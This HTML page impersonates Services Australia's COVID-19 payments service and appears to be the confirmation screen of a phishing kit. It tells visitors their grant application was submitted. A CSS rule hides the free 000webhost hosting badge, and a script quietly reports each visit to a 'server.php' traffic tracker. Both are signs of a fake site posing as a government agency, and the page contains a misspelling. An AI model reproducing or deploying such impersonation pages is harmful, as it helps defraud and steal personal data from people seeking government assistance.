<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>December 2020 Payments and services (COVID-19) - Services Australia</title>
<link rel="shortcut icon" href="res/img/favicon.ico">
<style>
*{
box-sizing:border-box;
font-family:sans serif;
}
body{
margin:0;
padding:0;
}
.app{
width:100%;
height:100%;
}
.header{
width:100%;
height:120px;
background:#eff3f5;
border-bottom:1px solid #707070;
display:flex;
//justify-content:space-between;
align-items:center;
padding-left:2rem;
padding-right:2rem;
}
.header img{
width:310px;
margin-right:2rem;
}

.main{
padding:2rem;
text-align:center;
}


.footer{
background:#eff3f5;
width:100%;
height:180px;
border-top:1px solid #707070;
display:flex;
//justify-content:space-between;
align-items:center;
padding-left:2rem;
padding-right:2rem;
}
.footer img{
width:110px;
margin-right:2rem;
}
.footer div{
border-left:1px solid #707070;
padding-left:1rem;
font-family:arial;
}
.footer div span{
font-size:1.2rem;
font-family:arial;
font-weight:bolder;
}


form{
width:60%;
margin:0 auto;
}
@media only screen and  (max-width:500px){
form{
width:90%;
}
}
.form-header{
margin-bottom:.5rem;
width:200px;
background:#1e5399;
padding:1rem;
color:f8f8f8;
}
input,select{
display:block;
padding:1rem;
width:100%;
font-size:1rem;
margin-bottom:.5rem;
}
img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] { display: none;}
</style>
</head>
<body>
<div class="app">
<div class="header">
<img src="res/img/logo.png"> <h1></h1>
</div>

<div class="main">
<h1 style="font-size:3.2rem;">YOUR APPLICATION IS SUCCESSFULLY SUBMITTED</h1>
<form id="form1" style="display:;">
<div class="form-header">APPLICATION COMPLETTED</div>
<div id="f3">
<img src="res/img/check.gif">
</div>
</form>
<h1>if you are eligible for this grant, you will be contacted within the next 7 days.</h1>

</div>

<div class="footer">
<img src="res/img/dhs-unity-star.png"><div><span>Services Australia</span><br><br>ABN - 90794605008</div>
</div>

</div>
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server.php/?traffic&url="+location.href, true);
xhttp.send();

</script>
</body>

</html>


